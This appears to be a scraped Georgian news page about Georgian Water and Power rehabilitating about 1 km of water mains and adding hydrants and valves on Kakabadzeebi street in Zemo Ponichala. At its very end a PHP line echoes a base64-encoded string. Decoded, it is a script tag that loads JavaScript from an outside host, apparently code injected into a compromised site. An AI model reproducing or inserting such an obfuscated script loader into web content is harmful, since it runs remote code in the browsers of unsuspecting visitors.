gorgia
ავერსი jaluzi

ზემო ფონიჭალას დასახლებაში, კაკაბაძეების ქუჩის მიმდებარედ, წყალმომარაგების სისტემური გაუმჯობესების მიზნით სარეაბილიტაციო სამუშაოებს მიმდინარეობს.

რეაბილიტაციის ფარგლებში აღნიშნულ ქუჩაზე სრულად განახლდება 1 კილომეტრამდე სიგრძის მოძველებული წყალსადენის მაგისტრალური ქსელი განშტოებებით. მოეწყობა ახალი საკვანძო ჭები, სახანძრო ჰიდრანტები და დამონტაჟდება ჩამკეტ-მარეგულირებელი ურდულები.

სარეაბილიტაციო პროექტი კომპანია ჯორჯიან უოთერ ენდ ფაუერმა 2025 წლის აპრილში დაიწყო და მიმდინარე წლის ივნისის ბოლოს დაასრულებს, პროექტის ჯამური ინვესტიცია 600 000 ლარამდეა.

რეაბილიტაციის შედეგად, ზემო ფონიჭალას დასახლებაში, კაკაბაძეების ქუჩისა და მიმდებარე ქუჩების მოსახლეობას მომსახურების ხარისხი მნიშვნელოვნად გაუუმჯობესდება.

წყალმომარაგებისა და წყალარინების ინფრასტრუქტურის განახლება და განვითარება ჯივიპის ერთ-ერთი პრიორიტეტული მიმართულებაა. სარეაბილიტაციო სამუშაოებს კომპანია ყოველწლიურად, გეგმის მიხედვით, აქტიურ რეჟიმში განახორციელებს.

143
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");